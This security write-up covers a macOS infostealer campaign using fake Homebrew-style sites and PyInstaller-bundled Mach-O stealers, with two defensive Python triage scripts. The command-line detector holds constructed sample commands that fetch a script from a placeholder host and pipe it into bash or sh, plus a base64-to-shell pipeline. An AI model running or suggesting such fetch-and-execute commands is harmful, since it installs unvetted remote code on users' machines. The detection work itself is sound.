A malicious campaign is targeting macOS developers through fake Homebrew, LogMeIn, and TradingView sites that distribute infostealing malware such as AMOS and Odyssey. The campaign relies on deception rather than an exploit: users are tricked into running harmful commands themselves in Terminal, which leads to the theft of sensitive information from their systems. Researchers identified over 85 domains involved in the scheme, promoted via Google Ads so that they surface in search results.
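The campaign's key step is a human pasting a one-liner into Terminal, so a useful defensive check is a triage heuristic over shell command lines (from shell history, an EDR process event, or a pasted lure) that flags the shapes such installers take. The following is an added example, not code from the researchers or from the campaign write-up; the sample commands are constructed and the `example.invalid` host is a placeholder. It flags three patterns: a remote fetch piped into an interpreter, a base64-decoded blob piped into an interpreter, and a remote fetch inside command substitution.

```python
import re
import shlex

# Constructed sample Terminal commands (not taken from the campaign). The first
# three have the shape of "paste this into Terminal" installers; the last two
# are ordinary developer activity and must not be flagged.
SAMPLE_COMMANDS = [
    'curl -fsSL https://example.invalid/install.sh | bash',
    'echo "aGVsbG8=" | base64 -d | sh',
    '/bin/bash -c "$(curl -fsSL https://example.invalid/setup)"',
    'brew install wget',
    'ls -la ~/Downloads',
]

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript"}

# Split a pipeline on single '|' only, so '||' (logical or) is left alone.
_PIPE_SPLIT = re.compile(r"(?<!\|)\|(?!\|)")
_B64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
_FETCH_IN_SUBST = re.compile(r"(\$\(|`)\s*(curl|wget)\b")


def _head(stage):
    """Program name (basename) of the first word of a pipeline stage."""
    try:
        words = shlex.split(stage)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        words = stage.split()
    return words[0].rsplit("/", 1)[-1] if words else ""


def classify_command(cmd):
    """Return the list of reasons a command looks like a paste-and-run installer.

    An empty list means no heuristic matched.
    """
    reasons = []
    stages = [s.strip() for s in _PIPE_SPLIT.split(cmd)]
    heads = [_head(s) for s in stages]

    # 1. curl/wget output flows into a shell or interpreter later in the pipe.
    for i, head in enumerate(heads):
        if head in FETCHERS and any(h in INTERPRETERS for h in heads[i + 1:]):
            reasons.append("remote content piped into an interpreter")
            break

    # 2. A base64-decoded blob flows into a shell or interpreter.
    for i, stage in enumerate(stages):
        if _B64_DECODE.search(stage) and any(h in INTERPRETERS for h in heads[i + 1:]):
            reasons.append("base64-decoded payload piped into an interpreter")
            break

    # 3. The fetch is hidden inside $(...) or backticks, e.g. bash -c "$(curl ...)".
    if _FETCH_IN_SUBST.search(cmd):
        reasons.append("remote fetch inside command substitution")

    return reasons


def triage(commands):
    """Map each flagged command to its reasons; unflagged commands are omitted."""
    flagged = {}
    for cmd in commands:
        reasons = classify_command(cmd)
        if reasons:
            flagged[cmd] = reasons
    return flagged


if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_COMMANDS).items():
        print(f"{cmd!r}: {', '.join(reasons)}")
```

The heuristic is deliberately narrow: it looks at pipeline structure, not at hostnames, so it keeps working when the campaign rotates its 85-plus domains. Pair it with blocking or alerting on Terminal-spawned `curl`/`bash` chains from an EDR, since a lure page can instruct the victim to split the command into steps that defeat any single-line check.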
Jamf Threat Labs has identified a technique in which attackers use PyInstaller to bundle Python-based infostealers into Mach-O executables on macOS. Because the bundle carries its own interpreter, the malware runs without a Python installation being present on the victim's system, and the samples layer on obfuscation to evade detection. The analysis covers both dynamic and static examination of the malicious binaries and documents behaviors consistent with infostealer activity.
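A PyInstaller bundle leaves a recognizable marker in the executable: the CArchive "cookie", an 88-byte record that starts with the magic `MEI\x0c\x0b\x0a\x0b\x0e` and records the archive size, the table-of-contents location, the Python version and the bundled libpython name (the layout is the `!8sIIii64s` struct from PyInstaller's own archive reader). The following triage script is an added example, not Jamf's tooling and not a detection rule from the report. It checks for a Mach-O header, scans the whole file for the cookie (on macOS the archive is not necessarily the last thing in the file, because a code signature may follow it), and parses what it finds. The sample binary it builds is constructed for the test and is not a real Mach-O.

```python
import struct

# Mach-O magic numbers as they appear in the first four bytes of a file:
# 32-bit and 64-bit, in both byte orders, plus the universal (fat) header.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe",
}

# PyInstaller CArchive cookie: magic, archive length, TOC offset, TOC length,
# Python version (e.g. 311 for 3.11), null-padded libpython name.
PYI_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
PYI_COOKIE_FORMAT = "!8sIIii64s"
PYI_COOKIE_LEN = struct.calcsize(PYI_COOKIE_FORMAT)  # 88 bytes


def is_macho(data):
    return data[:4] in MACHO_MAGICS


def _version_string(pyvers):
    # Modern PyInstaller stores major*100+minor (311); very old builds stored
    # major*10+minor (27). Handle both.
    if pyvers >= 100:
        return f"{pyvers // 100}.{pyvers % 100}"
    return f"{pyvers // 10}.{pyvers % 10}"


def find_pyinstaller_cookie(data):
    """Return the parsed cookie as a dict, or None if no cookie is present."""
    pos = data.rfind(PYI_COOKIE_MAGIC)
    if pos < 0 or pos + PYI_COOKIE_LEN > len(data):
        return None
    _magic, archive_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        PYI_COOKIE_FORMAT, data[pos:pos + PYI_COOKIE_LEN]
    )
    return {
        "cookie_offset": pos,
        "archive_length": archive_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": _version_string(pyvers),
        "python_lib": pylib.rstrip(b"\0").decode("ascii", "replace"),
    }


def triage_file(data):
    """Classify a file image: Mach-O or not, and whether it is a PyInstaller bundle."""
    macho = is_macho(data)
    cookie = find_pyinstaller_cookie(data) if macho else None
    if macho and cookie:
        verdict = "PyInstaller-bundled Mach-O: extract and inspect the Python payload"
    elif macho:
        verdict = "Mach-O without PyInstaller marker"
    else:
        verdict = "not a Mach-O"
    return {"is_macho": macho, "pyinstaller": cookie, "verdict": verdict}


def build_sample():
    """Constructed stand-in for a PyInstaller onefile Mach-O (not a real binary):
    a 64-bit little-endian magic, 60 bytes of padding, 64 bytes of placeholder
    archive data, then a cookie packed in PyInstaller's real layout."""
    header = b"\xcf\xfa\xed\xfe" + b"\x00" * 60
    archive = b"PYZ\x00" * 16
    cookie = struct.pack(
        PYI_COOKIE_FORMAT, PYI_COOKIE_MAGIC,
        len(archive) + PYI_COOKIE_LEN, 0, 16, 311, b"libpython3.11.dylib",
    )
    return header + archive + cookie


if __name__ == "__main__":
    print(triage_file(build_sample()))
```

The cookie alone does not make a binary malicious (plenty of legitimate macOS tools ship as PyInstaller bundles), but it tells an analyst that the real logic is Python bytecode inside the appended archive, so the next step is to carve the archive and decompile it rather than disassemble the Mach-O. Obfuscated samples of the kind the report describes may strip or relocate this cookie; in that case the absence of a marker in a file whose strings still reference `_MEIPASS` or `libpython` is itself worth a closer look.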